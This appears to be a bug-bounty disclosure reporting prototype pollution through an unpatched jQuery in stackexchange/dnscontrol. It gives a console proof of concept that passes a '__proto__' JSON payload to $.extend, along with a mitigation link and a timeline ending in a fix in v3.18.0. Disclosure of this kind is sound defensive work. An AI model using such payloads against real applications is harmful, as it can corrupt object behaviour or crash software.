stackexchange uses an unpached version of jQuery < 3.4.0 which exposes it to prototype pollution in stackexchange/dnscontrol

Valid

Reported on

Jul 12th 2022

Description

By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones.

This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf)

Impact

  • Integrity: An attacker can inject attributes that are used in other components.
  • Availability: An attacker can override existing attributes with ones that have incompatible type, which may lead to a crash.

Occurrences

Proof of Concept

Open your browser console and paste the following code:

$.extend(true, {}, JSON.parse('{ "__proto__": { "polluted": true } }'))
console.log({}.polluted)
// returns true

Mitigation

Patch can be found in the following link:

https://github.com/DanielRuf/snyk-js-jquery-174006

Proof of Fix

After fixing your code, the same command should return undefined:

$.extend(true, {}, JSON.parse('{ "__proto__": { "polluted": true } }'))
console.log({}.polluted)
// returns undefined
We are processing your report and will contact the stackexchange/dnscontrol team within 24 hours. 10 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 10 months ago
Timothee Desurmont modified the report
10 months ago
Jamie Slome
10 months ago

Admin

Hi Timothee, it looks like you tried to edit the report on 12th July @ 1 PM UTC. This process failed, and so I have re-run this for you just now :)

We have contacted a member of the stackexchange/dnscontrol team and are waiting to hear back 10 months ago
We have sent a follow up to the stackexchange/dnscontrol team. We will try again in 7 days. 10 months ago
We have sent a second follow up to the stackexchange/dnscontrol team. We will try again in 10 days. 10 months ago
stackexchange/dnscontrol maintainer modified the Severity from Critical to Low 10 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
stackexchange/dnscontrol maintainer validated this vulnerability 10 months ago
Timothee Desurmont has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
stackexchange/dnscontrol maintainer marked this as fixed in v3.18.0 with commit 9f5c35 10 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
default.html#L10 has been validated
to join this conversation